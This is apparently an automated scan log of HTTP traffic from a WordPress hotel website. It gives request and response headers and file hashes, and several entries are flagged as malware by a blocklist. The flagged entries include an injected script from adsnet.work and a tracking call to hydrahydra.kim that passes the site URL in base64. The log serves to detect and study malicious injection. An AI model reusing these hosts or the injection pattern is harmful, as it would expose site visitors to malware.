Magic:  ASCII text, with very long lines (608), with CRLF line terminators
Size:   674
Md5:    128c27147b96f3d4f8fa7d0e18e108d4
Sha1:   0b191c5996be341b6aed3e4cdfb0fbdc78c477a5
Sha256: 2d7b45dcf3a91565d6db89fa23598aaa6033518f4f7d0dcb23656569de9eb7df

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img4.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 26864
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   26864
Md5:    6e5ad791f548e4da07404985a9737343
Sha1:   aad04722efbe7e9771326155c241477b982d58fb
Sha256: 4c499c0136106e7c82ff44863252d8a4a8bdf70b4bd76db0db62319f68b17e05
                                        
                                            GET /wp-content/uploads/2018/08/logo4.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 03:04:29 GMT
Accept-Ranges: bytes
Content-Length: 1992
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 38x55, components 3\012- data
Size:   1992
Md5:    c112178d919e27c1c0519482ae8538d7
Sha1:   3eafd41f298f22c74e1fc7c463e1d05a1b5451f9
Sha256: 76b8a09640fbc6e423c2d8ae3367415ba6a27aa0ecd3f87889ca642e72ca8368
                                        
                                            GET /wp-content/uploads/2018/08/hamm.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 16:08:20 GMT
Accept-Ranges: bytes
Content-Length: 46302
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 299x299, segment length 16, baseline, precision 8, 640x248, components 3\012- data
Size:   46302
Md5:    3db32f0007744ef022658cde5022c673
Sha1:   c14fbf2d14d101038a5db478d49e0b8257a4e405
Sha256: e1067c429d672a0e63d612304511a327fe79feb74ffe930f0f7a142a652509eb
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "386B247C754310781563BA12E2D337B5CBF568A20717F18B5550614EEE597EF5"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21583
Expires: Thu, 01 Dec 2022 18:45:32 GMT
Date: Thu, 01 Dec 2022 12:45:49 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img1.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28676
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x458, components 3\012- data
Size:   28676
Md5:    afc67957823378e19cbb5d6c8e2d8d4e
Sha1:   e5e18086fb0ad14655212ef9a2f028cccb06cefa
Sha256: cb2827d9d6c253869047d413744ef9d25cbeb3cf14519f0aeb9410ed8bf3dae8
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img3.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 46391
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   46391
Md5:    6a5d207bfb1d4f38997520050e81b5f3
Sha1:   dfff8de2b7585c8dc3d523043843551ba761a958
Sha256: 8a5bb0988e36c711179c32162c3f6af8ee862088d4c0a2fb9b18af81e43dde90
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: http://www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2018 04:45:45 GMT
Accept-Ranges: bytes
Content-Length: 77160
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data
Size:   77160
Md5:    af7ae505a9eed503f8b8e6982036873e
Sha1:   d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
Sha256: 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img9.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 23821
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   23821
Md5:    5ba52dd8f2abe2df6caff0b26aa1c035
Sha1:   127bff082de765a274a659a8036dbc21be5a3a58
Sha256: 0227ac15cdda5f0aae46dc3e203d2598ec225526ece22a84d693123728cc3706
                                        
                                            GET /scripts/place.js HTTP/1.1 
Host: adsnet.work
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text
Size:   377
Md5:    4435b6168b6acda2edea1c16ab2d857a
Sha1:   eff2c42517e44a568b5011125b5cba022f27f67f
Sha256: dcd5ff0b5118befd94a04b7bbc750b5a7b473e39fefd81e235f79bd848916569

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img10.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 25670
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   25670
Md5:    5269e76b4cf719ae8c888a9f403936d7
Sha1:   1a18b5af3652fc2788969d802c201de0814c86cc
Sha256: c6f4cf401856130e7b79858d6d37e791a140f90042637311fc23dafcc764d67e
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img2.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 188292
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2200x1465, components 3\012- data
Size:   188292
Md5:    6f029a0c0d7d958cd4fce3c5a336504c
Sha1:   f203125d72b81f3564edb65ae0d7055325d2a835
Sha256: 23425eb441bc08086a231aaf326e0e4b068835c01d0f34d818a0869425525d4c
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img5.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33947
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x405, components 3\012- data
Size:   33947
Md5:    cc74b859b4a7bb7c9260a7dac0a6cdae
Sha1:   e7849e55c301ab8de0fbf5b19c3e57a9506c656a
Sha256: 124fd45a9b9b932dec2307cc03fdd4c8afb319825e4813cf95c516a02836ed2e
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img12.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31381
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x300, components 3\012- data
Size:   31381
Md5:    ec1dc8ac96cfed397d0d97ea7c203528
Sha1:   597a65fab99f5f8b4a0146d931c293e2dd22be4f
Sha256: b6b13e2852f9228707d55176d88995f6117eeaf038e37ec20c5125b98f1fcb82
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img14.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33178
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   33178
Md5:    13812f654aac0049de496aa17ef6c4fa
Sha1:   c3919ae7d6b674fc2778dd7c6dd0c31cdad97836
Sha256: 93655cd7d87085b9303906e935d5f9dc0882aae6b4257cc7ae50904073461224
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img11.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31761
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   31761
Md5:    6f48dee6c8ab44bab7bbe3e6df46ad8f
Sha1:   252d1a6fca0501ade4a8699d913de338ade0dbbb
Sha256: 8c669467a6210aac06ff5bcdf26311493cb2072c49cf0a9556015eaef60ae4b3
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img15.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28011
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   28011
Md5:    1e371f3ff649df58c23acce31761c31f
Sha1:   9178dd58f4c21f7cbf3e318efca3a6792ccf8756
Sha256: 5dc2ff3115d5794196e14d087f24a30a9e82ed3fbcea58298b929923fb60c3cd
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img16.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 30597
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   30597
Md5:    922fc9b1b0d01babc650d9ca31a7d078
Sha1:   09d738b55456dc393cdfaa6d453b662d37a4f9d9
Sha256: 7f8960b041a30a76460815e12b55033815d8cf92ad3b88fb33efb9d36d96c746
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img13.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 274612
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x790, components 3\012- data
Size:   274612
Md5:    c4aa6921f6d64521fbd4c897e2cef8eb
Sha1:   b95faf519de5b4d8c4b423a76b4f54a54e1d6d6d
Sha256: fe467c7cd9ab198a84c7ddc16d5d528effac44abc94d06364d7624440f3944b4
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img18.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33928
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   33928
Md5:    526e62a086e534f6699a45e016edc1b1
Sha1:   626d9485ee0620137faaf4ac83d83d156876cb39
Sha256: 614477818cc0d798842ffeed6ba4eecba77292ba3f02f0c632b12bae29d3cd68
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img17.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33488
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   33488
Md5:    fe0699038746940477cec9a5522bdaf5
Sha1:   e882a65a7be08f5130c48668a243e01a5fcfe9ea
Sha256: 2395ac4664e6667aebf945887995454630608d20165cab6bf83a32f0fe843316
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img19.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 25853
Keep-Alive: timeout=3, max=89
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   25853
Md5:    d134425489f1195d79fef5c38499afbe
Sha1:   725dafbb9c526fa68c4a400b783ad1f04ddf0cc6
Sha256: d5adebe39fab9a1a146ddb7efde27641d6f21128ee2a6b77de0de2bdf95bfd5b
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img22.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28738
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   28738
Md5:    aba437b795351e84b9d418538cc1cd45
Sha1:   ffa687ffba4f1f79d9705b35f9fb3ddc98bb9938
Sha256: 103c07e51c894261a1f92e3774d7219dd50cec69fada2ba3773317efbf1a3988
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img21.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31982
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   31982
Md5:    26308ac0a5ad42fe0ef500ed06a56c0e
Sha1:   986e1d010a301265294a3d71fe1384d5743bbc48
Sha256: ebb382cc2bfae70d0c439aecabf3873a836d451dcc774b1da8c123cf3c41d4f1
                                        
                                            GET /fetch.php?tracker=adsnet.work&site=aHR0cDovL3d3dy5ob3RlbHN3ZWIuc2l0ZS8= HTTP/1.1 
Host: hydrahydra.kim
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img23.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 41560
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   41560
Md5:    22ca0f524670eddd368b576d12a3b897
Sha1:   36cb3afe06df5915cfc75b5c4b0a3aa32184c6f1
Sha256: 68d5c0328a72c33903e288ae0cd9fcbd7e32a32f031f750c96f963dc8ad00737
                                        
                                            GET /wp-content/themes/travel-agency/images/fallback-img-410-250.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
